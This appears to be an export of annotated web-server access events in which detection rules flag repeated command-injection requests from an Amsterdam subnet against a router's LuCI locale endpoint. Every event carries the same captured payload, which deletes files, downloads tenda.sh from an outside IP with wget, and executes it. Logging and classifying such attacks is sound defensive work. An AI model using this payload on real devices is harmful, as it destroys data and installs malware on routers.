/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

Missing User-Agent header

details

Request had no User-Agent value (missing/empty field).

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#26 2024-05-23 10:54:50 event 1304983 GET 499

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#27 2024-05-23 10:54:50 event 1304983 GET 499

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#28 2024-05-23 10:54:50 event 1304982 GET http —

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#29 2024-05-23 10:54:50 event 1304982 GET http —

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#30 2024-05-23 10:54:49 event 1304981 GET 404 bytes 19155

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#31 2024-05-23 10:54:49 event 1304981 GET 404 bytes 19155

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#32 2024-05-23 10:54:49 event 1304981 GET 404 bytes 19155

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#33 2024-05-21 19:56:53 event 1244435 GET http —

ann ua 6 label ua

Request Missing User-Agent header

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

rule

ua:missing

conf

60.00

details

Request had no User-Agent value (missing/empty field).

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

Missing User-Agent header

details

Request had no User-Agent value (missing/empty field).

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#34 2024-05-21 19:56:53 event 1244437 GET 499

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#35 2024-05-21 19:56:53 event 1244436 GET 404 bytes 19155

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#36 2024-05-21 19:56:53 event 1244435 GET http —

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#37 2024-05-21 19:56:53 event 1244437 GET 499

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#38 2024-05-21 19:56:53 event 1244437 GET 499

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#39 2024-05-21 19:56:53 event 1244436 GET 404 bytes 19155

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#40 2024-05-21 19:56:53 event 1244436 GET 404 bytes 19155

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#41 2024-05-21 19:56:53 event 1244435 GET http —

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#42 2024-05-21 19:56:53 event 1244435 GET http —

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#43 2024-05-21 17:58:51 event 1244046 GET http —

ann ua 6 label ua

Request Missing User-Agent header

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

rule

ua:missing

conf

60.00

details

Request had no User-Agent value (missing/empty field).

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

Missing User-Agent header

details

Request had no User-Agent value (missing/empty field).

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#44 2024-05-21 17:58:51 event 1244048 GET 499

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#45 2024-05-21 17:58:51 event 1244047 GET 404 bytes 19155

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#46 2024-05-21 17:58:51 event 1244046 GET http —

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#47 2024-05-21 17:58:51 event 1244048 GET 499

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#48 2024-05-21 17:58:51 event 1244048 GET 499

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#49 2024-05-21 17:58:51 event 1244047 GET 404 bytes 19155

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#50 2024-05-21 17:58:51 event 1244047 GET 404 bytes 19155

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

Log Explorer

Annotated access events

Confirm Action